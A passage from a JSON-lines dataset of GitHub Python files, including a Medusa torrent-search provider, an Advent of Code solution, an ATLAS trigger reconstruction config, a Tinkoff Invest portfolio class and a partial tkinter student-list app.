float(l)!=0.0:\n\t\treturn 1.0-c/l\n\treturn 1.0\n\ndef run():\n\tglobal prevInChain\n\tfp1=open(dataFile,\"r\")\n\tfp2=open(\"javaTr.txt\",\"w\")\n\tfor ln in fp1.read().split(\"\\n\")[:-1]:\n\t\tvec=ln[-1]\n\t\tln=ln[:-1]\n\t\tvec=[str(ratioK(ln)),str(operators(ln)),str(comments(ln)),str(braces(ln)),str(indent(ln)),str(semicolon(ln)),str(programChain()),str(capital(ln)),str(ratioC(ln)),str(float(int(vec)))]\n\t\tprevInChain=0\n\t\tif vec[-1]==\"1.0\":\n\t\t\tprevInChain=1\n\t\tfp2.write(\"\\t\".join(vec))\n\t\tfp2.write(\"\\n\")\n\tfp1.close()\n\tfp2.close()\n\n# run()","repo_name":"TheHereticDruid/AQGDiscourse","sub_path":"dataGen.py","file_name":"dataGen.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73096958","text":"# coding=utf-8\n\n\"\"\"Provider code for EliteTorrent.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport logging\nimport re\n\nfrom medusa import tv\nfrom medusa.bs4_parser import BS4Parser\nfrom medusa.helper.common import try_int\nfrom medusa.logger.adapters.style import BraceAdapter\nfrom medusa.providers.torrent.torrent_provider import TorrentProvider\n\nfrom requests.compat import urljoin\n\nlog = BraceAdapter(logging.getLogger(__name__))\nlog.logger.addHandler(logging.NullHandler())\n\n\nclass EliteTorrentProvider(TorrentProvider):\n \"\"\"EliteTorrent Torrent provider.\"\"\"\n\n id_regex = re.compile(r'/torrent/(\\d+)')\n\n def __init__(self):\n \"\"\"Initialize the class.\"\"\"\n super(EliteTorrentProvider, self).__init__('EliteTorrent')\n\n # Credentials\n self.public = True\n\n # URLs\n self.url = 'https://elitetorrent.eu'\n self.urls = {\n 'base_url': self.url,\n 'search': urljoin(self.url, 'torrents.php'),\n 'download': urljoin(self.url, 'get-torrent/{0}'),\n }\n\n # Proper Strings\n\n # Miscellaneous Options\n self.onlyspasearch = None\n\n # Torrent Stats\n self.minseed = None\n self.minleech = None\n\n # Cache\n self.cache = tv.Cache(self, min_time=20)\n\n def search(self, search_strings, age=0, ep_obj=None, **kwargs):\n \"\"\"\n Search a provider and parse the results.\n\n :param search_strings: A dict with mode (key) and the search value (value)\n :param age: Not used\n :param ep_obj: Not used\n :returns: A list of search results (structure)\n \"\"\"\n results = []\n lang_info = '' if not ep_obj or not ep_obj.series else ep_obj.series.lang\n\n # Search query:\n # http://www.elitetorrent.net/torrents.php?cat=4&modo=listado&orden=fecha&pag=1&buscar=fringe\n # Search Params\n search_params = {\n 'cat': 4, # Shows\n 'modo': 'listado', # display results mode\n 'orden': 'fecha', # date order\n 'pag': 1, # page number\n 'buscar': '', # Search show\n }\n\n for mode in search_strings:\n log.debug('Search mode: {0}', mode)\n\n # Only search if user conditions are true\n if self.onlyspasearch and lang_info != 'es' and mode != 'RSS':\n log.debug('Show info is not Spanish, skipping provider search')\n continue\n\n for search_string in search_strings[mode]:\n\n if mode != 'RSS':\n search_string = re.sub(r'S0?(\\d+)E(\\d+)', r'\\1x\\2', search_string)\n search_params['buscar'] = search_string\n\n log.debug('Search string: {search}',\n {'search': search_string})\n\n response = self.session.get(self.urls['search'], params=search_params)\n if not response or not response.text:\n log.debug('No data returned from provider')\n continue\n\n results += self.parse(response.text, mode)\n\n return results\n\n def parse(self, data, mode):\n \"\"\"\n Parse search results for items.\n\n :param data: The raw response from a search\n :param mode: The current mode used to search, e.g. RSS\n\n :return: A list of items found\n \"\"\"\n items = []\n\n with BS4Parser(data, 'html5lib') as html:\n torrent_table = html.find('table', class_='fichas-listado')\n torrent_rows = torrent_table('tr') if torrent_table else []\n\n # Continue only if at least one release is found\n if len(torrent_rows) < 2:\n log.debug('Data returned from provider does not contain any torrents')\n return items\n\n # Skip column headers\n for row in torrent_rows[1:]:\n try:\n title = self._process_title(row.find('a', class_='nombre')['title'])\n torrent_id = EliteTorrentProvider.id_regex.match(row.find('a')['href'])\n if not all([title, torrent_id]):\n continue\n\n download_url = self.urls['download'].format(torrent_id.group(1))\n\n seeders = try_int(row.find('td', class_='semillas').get_text(strip=True))\n leechers = try_int(row.find('td', class_='clientes').get_text(strip=True))\n\n # Filter unseeded torrent\n if seeders < min(self.minseed, 1):\n if mode != 'RSS':\n log.debug(\"Discarding torrent because it doesn't meet the\"\n \" minimum seeders: {0}. Seeders: {1}\",\n title, seeders)\n continue\n\n size = -1 # Provider does not provide size\n\n item = {\n 'title': title,\n 'link': download_url,\n 'size': size,\n 'seeders': seeders,\n 'leechers': leechers,\n 'pubdate': None,\n }\n if mode != 'RSS':\n log.debug('Found result: {0} with {1} seeders and {2} leechers',\n title, seeders, leechers)\n\n items.append(item)\n except (AttributeError, TypeError, KeyError, ValueError, IndexError):\n log.exception('Failed parsing provider.')\n\n return items\n\n @staticmethod\n def _process_title(title):\n if title:\n # Quality, if no literal is defined it's HDTV\n if 'calidad' not in title:\n title += ' HDTV x264'\n else:\n title = title.replace('(calidad baja)', 'HDTV x264')\n title = title.replace('(Buena calidad)', '720p HDTV x264')\n title = title.replace('(Alta calidad)', '720p HDTV x264')\n title = title.replace('(calidad regular)', 'DVDrip x264')\n title = title.replace('(calidad media)', 'DVDrip x264')\n\n # Language, all results from this provider have spanish audio,\n # We append it to title (to avoid downloading undesired torrents)\n title += ' SPANISH AUDIO-ELITETORRENT'\n\n return title\n\n\nprovider = EliteTorrentProvider()\n","repo_name":"smoresmores/Medusa","sub_path":"medusa/providers/torrent/html/elitetorrent.py","file_name":"elitetorrent.py","file_ext":"py","file_size_in_byte":6447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"11267835927","text":"from dataIO import dataIO\nimport os\n\nconfig_FILEPATH = os.getcwd() + '/rsc/config.json'\n\nif dataIO.is_valid_json(config_FILEPATH):\n config = dataIO._read_json(config_FILEPATH)\nelse:\n config = {\n\t\t\"access_token\": os.environ[\"ACCESS_TOKEN\"],\n\t\t\"client_id\": os.environ[\"CLIENT_ID\"],\n \"client_id_secret\": os.environ[\"CLIENT_ID_SECRET\"],\n\t\t\"prefix\": \"!\"\n }","repo_name":"Rindo93/mpu","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7330859528","text":"#!/usr/bin/python3\nfrom typing import List, Tuple\n\n\nfile = './sample.txt' if 0 else './input.txt'\n\n\nclass Grid:\n def __init__(self, grid: List[List[str]]) -> None:\n self.grid = grid\n self.changed = False\n self.width = len(self.grid[0])\n self.height = len(self.grid)\n\n def step(self):\n self.changed = False\n self.move('>', (1, 0))\n self.move('v', (0, 1))\n return self.changed\n\n def move(self, val: str, dir: Tuple[int, int]):\n visited = set()\n for y, row in enumerate(self.grid):\n for x, cell in enumerate(row):\n if (x, y) in visited:\n continue\n if cell != '.':\n visited.add((x, y))\n if cell == val:\n new_y = (y+dir[1]) % self.height\n new_x = (x+dir[0]) % self.width\n if (new_x, new_y) not in visited and self.grid[new_y][new_x] == '.':\n self.grid[new_y][new_x] = val\n self.grid[y][x] = '.'\n self.changed = True\n visited.add((new_x, new_y))\n\n def __repr__(self):\n return '\\n'.join([''.join(row) for row in self.grid])\n\n\ndef part1():\n with open(file) as f:\n data = f.read()\n\n grid = [[cell for cell in row] for row in data.splitlines()]\n grid = Grid(grid)\n i = 1\n while grid.step():\n i += 1\n print(f'part1: {i}')\n\n\ndef part2():\n pass\n\n\nif __name__ == '__main__':\n part1()\n # part2()\n","repo_name":"idanzur/aoc-2021","sub_path":"25/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71109922113","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\nfrom AthenaConfiguration.Enums import Format\nfrom TrigT1ResultByteStream.TrigT1ResultByteStreamConfig import L1TriggerByteStreamDecoderCfg\nfrom TrigConfigSvc.TrigConfigSvcCfg import TrigConfigSvcCfg\nfrom TriggerJobOpts.TriggerByteStreamConfig import ByteStreamReadCfg\nfrom TrigEDMConfig.TriggerEDM import getTriggerEDMList\nfrom TrigEDMConfig.Utils import edmDictToList\nfrom OutputStreamAthenaPool.OutputStreamConfig import addToAOD, addToESD\n\nfrom AthenaCommon.Logging import logging\nlog = logging.getLogger('TriggerRecoConfig')\n\n\ndef TriggerRecoCfg(flags):\n if flags.Input.isMC:\n return TriggerRecoCfgMC(flags)\n else:\n return TriggerRecoCfgData(flags)\n\ndef TriggerRecoCfgData(flags):\n \"\"\" Configures trigger data decoding\n Run 3 data:\n HLTResultMTByteStreamDecoderAlg -> TriggerEDMDeserialiserAlg\n\n Run 2 data:\n TrigBSExtraction -> TrigDecisionMaker -> DecisionConv to xAOD -> NavigationConv to xAOD\n\n Run 1 data:\n as for Run 2 + Run 1 EDM to xAOD conversion\n \"\"\"\n log.debug(\"TriggerRecoCfgData: Preparing the trigger handling of reconstruction of data\")\n acc = ComponentAccumulator()\n acc.merge( ByteStreamReadCfg(flags) )\n if flags.Trigger.L1.doMuon or flags.Trigger.L1.doCalo or flags.Trigger.L1.doTopo or flags.Trigger.L1.doCTP:\n acc.merge( L1TriggerByteStreamDecoderCfg(flags) )\n\n metadataAcc, _ = TriggerMetadataWriterCfg(flags)\n acc.merge( metadataAcc )\n\n # Run 3+\n if flags.Trigger.EDMVersion >= 3:\n acc.merge(Run3TriggerBSUnpackingCfg(flags))\n\n from TrigDecisionMaker.TrigDecisionMakerConfig import Run3DecisionMakerCfg\n acc.merge(Run3DecisionMakerCfg(flags))\n\n from TrigNavSlimmingMT.TrigNavSlimmingMTConfig import TrigNavSlimmingMTCfg\n acc.merge(TrigNavSlimmingMTCfg(flags))\n\n # Run 1+2\n elif flags.Trigger.EDMVersion in [1, 2]:\n acc.merge( Run1Run2BSExtractionCfg(flags) )\n\n from TrigDecisionMaker.TrigDecisionMakerConfig import Run1Run2DecisionMakerCfg\n acc.merge (Run1Run2DecisionMakerCfg(flags) )\n\n acc.merge(Run2Run1NavigationSlimingCfg(flags))\n else:\n raise RuntimeError(\"Invalid EDMVersion=%s \" % flags.Trigger.EDMVersion)\n\n # Legacy L1Calo, L1Topo reco\n if flags.Trigger.enableL1CaloLegacy:\n from AnalysisTriggerAlgs.AnalysisTriggerAlgsCAConfig import RoIBResultToxAODCfg\n xRoIBResultAcc, _ = RoIBResultToxAODCfg(flags)\n acc.merge( xRoIBResultAcc )\n\n if flags.Input.Format is Format.BS:\n from L1TopoByteStream.L1TopoByteStreamConfig import L1TopoRawDataContainerBSCnvCfg\n acc.merge( L1TopoRawDataContainerBSCnvCfg(flags) )\n topoEDM = ['xAOD::L1TopoRawDataContainer#L1TopoRawData',\n 'xAOD::L1TopoRawDataAuxContainer#L1TopoRawDataAux.']\n acc.merge(addToESD(flags, topoEDM))\n acc.merge(addToAOD(flags, topoEDM))\n\n acc.merge(TriggerEDMCfg(flags))\n\n return acc\n\ndef TriggerRecoCfgMC(flags):\n \"\"\" Configures trigger MC handing during reconstruction\n Run 3 MC:\n Propagation of HLT collections from input RDO_TRIG to output POOL files\n Execution of reconstruction-level trigger navigation slimming\n\n RDO_TRIG containing simulation of the Run 1, Run 2 trigger:\n Not currently supported.\n \"\"\"\n\n # Check for currently unsuported operational modes, these may be supported in the future if needed\n if flags.Input.Format is Format.BS:\n log.warning(\"TriggerRecoCfgMC does not currently support MC files encoded as bytestream. Switching off handling of trigger inputs.\")\n return ComponentAccumulator()\n if flags.Trigger.EDMVersion in [1, 2]:\n log.warning(\"TriggerRecoCfgMC does not currently support MC files with Run 1 or Run 2 trigger payload. Switching off handling of trigger inputs.\")\n return ComponentAccumulator()\n\n log.debug(\"TriggerRecoCfgMC: Preparing the trigger handling of reconstruction of MC\")\n acc = ComponentAccumulator()\n\n from TrigNavSlimmingMT.TrigNavSlimmingMTConfig import TrigNavSlimmingMTCfg\n acc.merge(TrigNavSlimmingMTCfg(flags))\n\n acc.merge(TriggerEDMCfg(flags))\n\n return acc\n\ndef TriggerMetadataWriterCfg(flags):\n \"\"\"Sets up access to HLT, L1, BGRP, Monitoring, HLT PS and L1 PS JSON files from 'FILE' or 'DB', writes JSON to metaStore and keys to eventStore\"\"\"\n acc = ComponentAccumulator()\n keyWriterOutput = \"\"\n if flags.Trigger.triggerConfig != 'INFILE':\n acc.merge( TrigConfigSvcCfg(flags) )\n keyWriterTool = CompFactory.TrigConf.KeyWriterTool(\"KeyWriterToolOffline\")\n keyWriterOutput = str(keyWriterTool.ConfKeys)\n acc.addEventAlgo( CompFactory.TrigConf.xAODMenuWriterMT(\"xAODMenuWriterMT\", KeyWriterTool = keyWriterTool) )\n return acc, keyWriterOutput\n\ndef TriggerEDMCfg(flags):\n \"\"\"Configures which trigger collections are recorded\"\"\"\n acc = ComponentAccumulator()\n\n # Check if we have anything to do\n if flags.Output.doWriteESD is False and flags.Output.doWriteAOD is False:\n log.debug(\"TriggerEDMCfg: Nothing to do as both Output.doWriteAOD and Output.doWriteESD are False\")\n return acc\n\n # standard collections & metadata\n # TODO consider unifying with TriggerConfig.triggerPOOLOutputCfg - there the assumption is that Run3 \n # metadata\n menuMetadata = [\"xAOD::TriggerMenuJsonContainer#*\", \"xAOD::TriggerMenuJsonAuxContainer#*\",]\n if flags.Trigger.EDMVersion in [1,2]:\n menuMetadata += ['xAOD::TriggerMenuAuxContainer#*', 'xAOD::TriggerMenuContainer#*',]\n # Add LVL1 collections (for Run-3 they are part of the \"regular\" EDM lists)\n from TrigEDMConfig.TriggerEDM import getLvl1ESDList, getLvl1AODList\n acc.merge(addToESD(flags, edmDictToList(getLvl1ESDList())))\n acc.merge(addToAOD(flags, edmDictToList(getLvl1AODList())))\n\n edmVersion = max(2, flags.Trigger.EDMVersion)\n _TriggerESDList = getTriggerEDMList(flags.Trigger.ESDEDMSet, edmVersion)\n _TriggerAODList = getTriggerEDMList(flags.Trigger.AODEDMSet, edmVersion)\n log.debug(\"ESD EDM list: %s\", _TriggerESDList)\n log.debug(\"AOD EDM list: %s\", _TriggerAODList)\n \n # Highlight what is in AOD list but not in ESD list, as this can cause\n # the \"different number of entries in branch\" problem, when it is in the\n # AOD list but the empty container per event is not created\n # Just compares keys of dicts, which are the class names, not their string keys in StoreGate\n not_in = [ element for element in _TriggerAODList if element not in _TriggerESDList ]\n if (len(not_in)>0):\n log.warning(\"In AOD list but not in ESD list: \")\n log.warning(not_in)\n else:\n log.info(\"AOD list is subset of ESD list - good.\")\n\n # there is internal gating in addTo* if AOD or ESD do not need to be written out\n acc.merge(addToESD(flags, edmDictToList(_TriggerESDList), MetadataItemList = menuMetadata))\n acc.merge(addToAOD(flags, edmDictToList(_TriggerAODList), MetadataItemList = menuMetadata))\n \n log.info(\"AOD content set according to the AODEDMSet flag: %s and EDM version %d\", flags.Trigger.AODEDMSet, flags.Trigger.EDMVersion)\n # navigation for Run 3\n if flags.Trigger.EDMVersion == 3 and not flags.Trigger.doOnlineNavigationCompactification and not flags.Trigger.doNavigationSlimming:\n nav = ['xAOD::TrigCompositeContainer#HLTNav*', 'xAOD::TrigCompositeAuxContainer#HLTNav*',]\n acc.merge(addToAOD(flags, nav))\n acc.merge(addToESD(flags, nav))\n # extra jet keys\n jetSpecials = [\"JetKeyDescriptor#JetKeyMap\", \"JetMomentMap#TrigJetRecMomentMap\",]\n acc.merge(addToESD(flags, jetSpecials))\n acc.merge(addToAOD(flags, jetSpecials))\n\n # RoIs\n if flags.Output.doWriteAOD and flags.Trigger.EDMVersion == 2:\n from TrigRoiConversion.TrigRoiConversionConfig import RoiWriterCfg\n acc.merge(RoiWriterCfg(flags))\n\n return acc\n\ndef Run2Run1NavigationSlimingCfg(flags):\n \"\"\"Configures legacy Run1/2 navigation slimming\"\"\"\n acc = ComponentAccumulator()\n\n if flags.Trigger.DecodeHLT is False:\n log.debug(\"Run2Run1NavigationSlimingCfg: Nothing to do as Trigger.DecodeHLT is False\")\n return acc\n\n if flags.Trigger.doNavigationSlimming is False:\n log.debug(\"Run2Run1NavigationSlimingCfg: Nothing to do as Trigger.doNavigationSlimming is False\")\n return acc\n\n def _flatten(edm):\n return list(y.split('-')[0] for x in edm.values() for y in x)\n from TrigNavTools.TrigNavToolsConfig import TrigNavigationThinningSvcCfg\n \n from OutputStreamAthenaPool.OutputStreamConfig import OutputStreamCfg\n\n if flags.Output.doWriteAOD:\n _TriggerAODList = getTriggerEDMList(flags.Trigger.AODEDMSet, flags.Trigger.EDMVersion)\n thinningSvc = acc.getPrimaryAndMerge(TrigNavigationThinningSvcCfg(flags, \n {'name' : 'HLTNav_StreamAOD',\n 'mode' : 'cleanup_noreload', \n 'result' : 'HLTResult_HLT',\n 'features' : _flatten(_TriggerAODList)}))\n acc.merge(OutputStreamCfg(flags, \"AOD\", trigNavThinningSvc = thinningSvc))\n\n if flags.Output.doWriteESD:\n _TriggerESDList = getTriggerEDMList(flags.Trigger.ESDEDMSet, flags.Trigger.EDMVersion)\n thinningSvc = acc.getPrimaryAndMerge(TrigNavigationThinningSvcCfg(flags,\n {'name' : 'HLTNav_StreamESD',\n 'mode' : 'cleanup_noreload', \n 'result' : 'HLTResult_HLT',\n 'features' : _flatten(_TriggerESDList)}))\n acc.merge(OutputStreamCfg(flags, \"ESD\", trigNavThinningSvc = thinningSvc))\n\n return acc\n\n\ndef Run1Run2BSExtractionCfg( flags ):\n \"\"\"Configures Trigger data from BS extraction \"\"\"\n from SGComps.AddressRemappingConfig import InputRenameCfg\n\n acc = ComponentAccumulator()\n extr = CompFactory.TrigBSExtraction()\n robIDMap = {} # map of result keys and their ROB ID\n\n # Add fictional output to ensure data dependency in AthenaMT\n extr.ExtraOutputs += [(\"TrigBSExtractionOutput\", \"StoreGateSvc+TrigBSExtractionOutput\")]\n\n if flags.Trigger.DecodeHLT:\n # Run-1: add xAOD conversion tool\n if flags.Trigger.EDMVersion == 1:\n extr.BStoxAOD = acc.popToolsAndMerge( Run1xAODConversionCfg(flags) )\n\n serialiserTool = CompFactory.TrigTSerializer()\n acc.addPublicTool(serialiserTool)\n extr.NavigationForL2 = CompFactory.HLT.Navigation(\"NavigationForL2\", \n ClassesFromPayloadIgnore = [\"TrigPassBits#passbits\"]) # Ignore the L2 TrigPassBits to avoid clash with EF (ATR-23411)\n\n extr.Navigation = CompFactory.HLT.Navigation(\"Navigation\")\n from TrigEDMConfig.TriggerEDM import getEDMLibraries\n extr.Navigation.Dlls = getEDMLibraries() \n from TrigEDMConfig.TriggerEDM import getPreregistrationList\n extr.Navigation.ClassesToPreregister = getPreregistrationList(flags.Trigger.EDMVersion)\n from eformat import helper as efh\n \n if flags.Trigger.EDMVersion == 1: # Run-1 has L2 and EF result\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_L2\", \"HLTResult_L2_BS\"))\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_EF\", \"HLTResult_EF_BS\"))\n robIDMap[\"HLTResult_L2_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_LVL2, 0).code()\n robIDMap[\"HLTResult_EF_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_EVENT_FILTER, 0).code()\n extr.L2ResultKeyIn = \"HLTResult_L2_BS\"\n extr.L2ResultKeyOut = \"HLTResult_L2\"\n extr.HLTResultKeyIn = \"HLTResult_EF_BS\"\n extr.HLTResultKeyOut = \"HLTResult_EF\"\n else:\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", \"HLTResult_HLT\", \"HLTResult_HLT_BS\"))\n robIDMap[\"HLTResult_HLT_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_HLT, 0).code()\n extr.HLTResultKeyIn = \"HLTResult_HLT_BS\"\n extr.HLTResultKeyOut = \"HLTResult_HLT\"\n \n # Configure Run-2 DataScouting\n if flags.Trigger.EDMVersion == 2:\n stream = flags.Input.TriggerStream\n if stream.startswith('calibration_DataScouting_'):\n ds_tag = '_'.join(stream.split('_')[1:3]) # e.g. DataScouting_05\n ds_id = int(stream.split('_')[2]) # e.g. 05\n acc.merge(InputRenameCfg(\"HLT::HLTResult\", ds_tag, ds_tag+\"_BS\"))\n robIDMap[ds_tag+\"_BS\"] = efh.SourceIdentifier(efh.SubDetector.TDAQ_HLT, ds_id).code()\n extr.DSResultKeysIn += [ ds_tag+\"_BS\" ]\n extr.DSResultKeysOut += [ ds_tag ]\n\n else:\n log.info(\"Will not schedule real HLT bytestream extraction, instead EDM gap filling is running\")\n # if data doesn't have HLT info set HLTResult keys as empty strings to avoid warnings\n # but the extraction algorithm must run\n extr.HLTResultKeyIn = \"\"\n extr.HLTResultKeyOut = \"\"\n\n HLTResults = [ f\"HLT::HLTResult/{k}\" for k in robIDMap.keys() ]\n acc.addService( CompFactory.ByteStreamAddressProviderSvc( TypeNames = HLTResults) )\n\n from TrigEDMConfig.TriggerEDM import getTPList\n acc.addPublicTool( CompFactory.TrigSerTPTool(TPMap = getTPList((flags.Trigger.EDMVersion))) )\n \n acc.addPublicTool( CompFactory.TrigSerializeConvHelper(doTP = True) )\n\n acc.addPublicTool( CompFactory.HLT.HLTResultByteStreamTool(HLTResultRobIdMap = robIDMap))\n\n acc.addEventAlgo(extr)\n\n return acc\n\ndef Run1xAODConversionCfg(flags):\n \"\"\"Convert Run 1 EDM collections to xAOD classes\"\"\"\n acc = ComponentAccumulator()\n\n log.info(\"Will configure Run 1 trigger EDM to xAOD conversion\")\n from TrigEDMConfig.TriggerEDM import getTriggerEDMList\n from TrigEDMConfig.TriggerEDM import getEFRun1BSList,getEFRun2EquivalentList,getL2Run1BSList,getL2Run2EquivalentList\n\n from TrkConfig.TrkParticleCreatorConfig import TrackParticleCreatorToolCfg\n partCreatorTool = acc.popToolsAndMerge(TrackParticleCreatorToolCfg(flags,\n PixelToTPIDTool=None\n )\n )\n acc.addPublicTool(partCreatorTool)\n\n from xAODTrackingCnv.xAODTrackingCnvConfig import TrackCollectionCnvToolCfg,RecTrackParticleContainerCnvToolCfg\n trackCollCnvTool = acc.popToolsAndMerge(TrackCollectionCnvToolCfg(flags,\n name=\"TrackCollectionCnvTool\",\n TrackParticleCreator= partCreatorTool\n )\n )\n\n recPartCnvTool = acc.popToolsAndMerge(RecTrackParticleContainerCnvToolCfg(flags,\n name=\"RecParticleCnv\",\n TrackParticleCreator=partCreatorTool\n )\n )\n \n bstoxaodTool = CompFactory.TrigBStoxAODTool(\"BStoxAOD\", \n ContainersToConvert = getL2Run1BSList() + getEFRun1BSList(), \n NewContainers = getL2Run2EquivalentList() + getEFRun2EquivalentList(),\n TrackCollectionCnvTool = trackCollCnvTool,\n TrackParticleContainerCnvTool = recPartCnvTool\n )\n acc.setPrivateTools(bstoxaodTool)\n\n # write the xAOD (Run-2) classes to the output\n acc.merge(addToESD(flags, edmDictToList(getTriggerEDMList(flags.Trigger.ESDEDMSet, runVersion=2))))\n acc.merge(addToAOD(flags, edmDictToList(getTriggerEDMList(flags.Trigger.AODEDMSet, runVersion=2))))\n\n return acc\n\ndef Run3TriggerBSUnpackingCfg(flags):\n \"\"\"Configures conversions BS -> HLTResultMT -> Collections \"\"\"\n acc = ComponentAccumulator()\n\n if flags.Trigger.DecodeHLT is False:\n log.debug(\"Run3TriggerBSUnpackingCfg: Nothing to do as Trigger.DecodeHLT is False\")\n return acc\n\n from AthenaCommon.CFElements import seqAND\n decoder = CompFactory.HLTResultMTByteStreamDecoderAlg()\n deserialiser = CompFactory.TriggerEDMDeserialiserAlg(\"TrigDeserialiser\")\n from TrigDecisionTool.TrigDecisionToolConfig import getRun3NavigationContainerFromInput\n deserialiser.ExtraOutputs += [('xAOD::TrigCompositeContainer' , 'StoreGateSvc+'+getRun3NavigationContainerFromInput(flags))]\n acc.addSequence(seqAND(\"HLTDecodingSeq\"))\n acc.addEventAlgo( decoder, \"HLTDecodingSeq\")\n acc.addEventAlgo( deserialiser, \"HLTDecodingSeq\")\n log.debug(\"Configured HLT result BS decoding sequence\")\n return acc\n\n\nif __name__ == '__main__':\n from AthenaConfiguration.MainServicesConfig import MainServicesCfg\n from AthenaConfiguration.AllConfigFlags import initConfigFlags\n\n flags = initConfigFlags()\n flags.fillFromArgs()\n\n from AthenaConfiguration.TestDefaults import defaultTestFiles\n flags.Input.Files = defaultTestFiles.RAW_RUN3 # need to update this depending on EDMversion\n flags.Exec.MaxEvents=5\n log.info('Checking setup for EDMVersion %d', flags.Trigger.EDMVersion)\n if flags.Trigger.EDMVersion==1:\n flags.Input.Files = defaultTestFiles.RAW_RUN1\n elif flags.Trigger.EDMVersion==2:\n flags.Input.Files = defaultTestFiles.RAW_RUN2\n elif flags.Trigger.EDMVersion==3:\n flags.Input.Files = defaultTestFiles.RAW_RUN3\n \n\n flags.lock()\n\n acc = MainServicesCfg(flags)\n acc.merge( TriggerRecoCfg(flags) )\n acc.printConfig(withDetails=True)\n with open(\"TriggerReco.pkl\", \"wb\") as file:\n acc.store(file)\n # TODO decide if we want to run actually\n # sc = acc.run()\n # if sc.isFailure():\n # import sys\n # sys.exit(-1)\n\n","repo_name":"Yusuf-Manjra/athena","sub_path":"Trigger/TriggerCommon/TriggerJobOpts/python/TriggerRecoConfig.py","file_name":"TriggerRecoConfig.py","file_ext":"py","file_size_in_byte":18649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21836512435","text":"import tinvest as tinvest\nimport control.account.variables as variables\n\naccount = tinvest.SyncClient(variables.token)\n\n\nclass Portfolio:\n \"\"\" клас Портфолио, пока по умолчанию используется обычный брокер счет (variables.broker_account_id)\n \"\"\"\n\n def __init__(self):\n self.broker_account_id = variables.broker_account_id\n self.portfolio = account.get_portfolio(self.broker_account_id)\n self.stocks = []\n self.bond = []\n self.etf = []\n self.currency = []\n self.get_all_position()\n\n def get_all_position(self):\n \"\"\" разбираем по коллекциям акции, облигации, фонды и тп\n \"\"\"\n for p in self.portfolio.payload.positions:\n if p.instrument_type.value == \"Stock\":\n self.stocks.append(p)\n if p.instrument_type.value == \"Bond\":\n self.bond.append(p)\n if p.instrument_type.value == \"Etf\":\n self.etf.append(p)\n if p.instrument_type.value == \"Currency\":\n self.currency.append(p)\n\n def get_exchange_rate_usd(self):\n return float(account.get_market_orderbook(\"BBG0013HGFT4\", 1).payload.close_price) # цена доллара из стакана, имхо\n\n\nportfolio = Portfolio()\n","repo_name":"PaskomS/tipaskom","sub_path":"control/account/cur_account.py","file_name":"cur_account.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5449586573","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\n#CREACIÓN DE LA VENTATA\napp= Tk()\napp.geometry (\"500x300\")\napp.title(\"Listado de Estudiantes\")\napp.resizable(0,0)\n\n#MENÚ DE INICIO\nencabezado=Label(app, text =\"Listado de Estudiantes\")\nencabezado.config(\n fg=\"white\",\n bg=\"black\",\n padx=100,\n pady=20,\n font=(\"Tahoma\",30) \n)\nencabezado.grid (row=0, column=0, columnspan=11, sticky=W)\n\n# ACCIÓN DEL RADIOBUTTON\ndef marcar():\n marcado.config(text=opcion)\n\n#AGREGAR ESTUDIANTE\ndef agregar():\n\tif(len(nomest)==5):\n\t\ttop = messagebox.showerror('Error', \"Se ha registrado el máximo número de estudiantes posible.\")\n\n\telse:\n\t\n\t\t\t#CREAR VENTANA NUEVA\n\t\t\ttop = Toplevel()\n\t\t\ttop.title(\"Añadir estudiantes\")\n\t\t\ttop.geometry(\"300x205\")\n\t\t\t#AGREGAR NOMBRE\n\t\t\tLabel(top,text=\"Introduzca el nombre:\").place(x=0,y=0)\n\t\t\tEntry(top,bd=5,bg='white',textvariable=agnom, fg='black').place(x=0,y=30)\n\t\t\t#AGREGAR APELLIDO\n\t\t\tLabel(top,text=\"Introduzca el apellido:\").place(x=0,y=60)\n\t\t\tEntry(top,bd=5,bg='white', textvariable=aglast, fg='black').place(x=0,y=80)\n\t\t\t#AGREGAR NOTA\n\t\t\tLabel(top,text=\"Introduzca la nota del estudiante:\").place(x=0,y=120)\n\t\t\tEntry(top,bd=5,bg='white', textvariable=agnota, fg='black').place(x=0,y=140)\n\t\t\t#BOTÓN AGREGAR\n\t\t\tButton(top,text= \"Agregar\",command=agregar2).place(x=0,y=180)\n\t\t\tButton(top,text= \"Cerrar\",command=top.destroy).place(x=60,y=180)\n \ndef agregar2():\n\tif(len(nomest)==10):\n\t\ttop = messagebox.showerror('Error', \"Se ha registrado el máximo número de estudiantes posible.\")\n\telif((agnom.get()=='') and (aglast.get()=='') and ((agnota.get()<0) or (agnota.get()>100))):\n\t\ttop = messagebox.showerror('Error', \"Todos los datos ingresados son inválidos.\")\n\telif((agnom.get()=='') and (aglast.get()=='')):\n\t top = messagebox.showerror('Error', \"Por favor ingrese uno o más nombres y apellidos.\")\n\telif(agnom.get()==''):\n\t\ttop = messagebox.showerror('Error', \"Por favor ingrese uno o más nombres.\")\n\telif(aglast.get()==''):\n\t\ttop = messagebox.showerror('Error', \"Por favor ingrese uno o más apellidos.\")\n\telif((agnota.get()<0) or (agnota.get()>100)):\n\t\ttop = messagebox.showerror('Error', \"La nota ingresada no se encuentra en el intervalo permitido.\")\n\telse:\n\t\tnomest.append(agnom.get() + ' ' + 